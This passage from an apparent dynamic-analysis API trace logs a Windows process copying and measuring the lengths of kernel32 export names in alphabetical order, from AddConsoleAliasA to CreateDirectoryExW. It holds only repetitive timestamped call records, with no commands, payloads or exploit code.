lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.060] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.060] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.060] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.060] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.060] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.060] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.060] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.060] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.060] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.060] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.060] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.060] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.060] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.060] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.061] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.061] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.061] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.061] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.061] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.061] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.061] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.061] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.061] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.061] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.061] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.061] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.061] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.061] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.061] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.061] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.061] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.061] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.062] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.062] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.062] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.062] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.062] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.062] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.062] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.062] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.062] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.062] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.062] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.062] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.062] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.062] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.062] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.062] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.062] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.062] lstrlenA (lpString="BEEP") returned 4 [0084.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.063] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.063] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.063] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.063] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.063] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.063] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.063] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.063] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.063] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.063] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.063] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.063] lstrlenA (lpString="CANCELIO") returned 8 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.063] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.063] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.063] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.063] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.063] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.063] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.063] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.064] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.064] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.064] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.064] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.064] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.064] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.064] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.064] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.064] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.064] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.064] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.064] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.064] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.064] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.064] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.064] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.064] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.064] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.065] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.065] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.065] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.065] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.065] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.065] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.065] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.065] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.065] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.065] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.065] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.065] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.065] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.065] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.065] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.065] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.065] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.065] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.066] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.066] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.066] lstrlenA (lpString="COPYFILEA") returned 9 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.066] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.066] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.066] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.066] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.066] lstrlenA (lpString="COPYFILEW") returned 9 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.066] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.066] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.066] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.066] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.066] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.066] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.066] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.066] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.066] lstrlenA 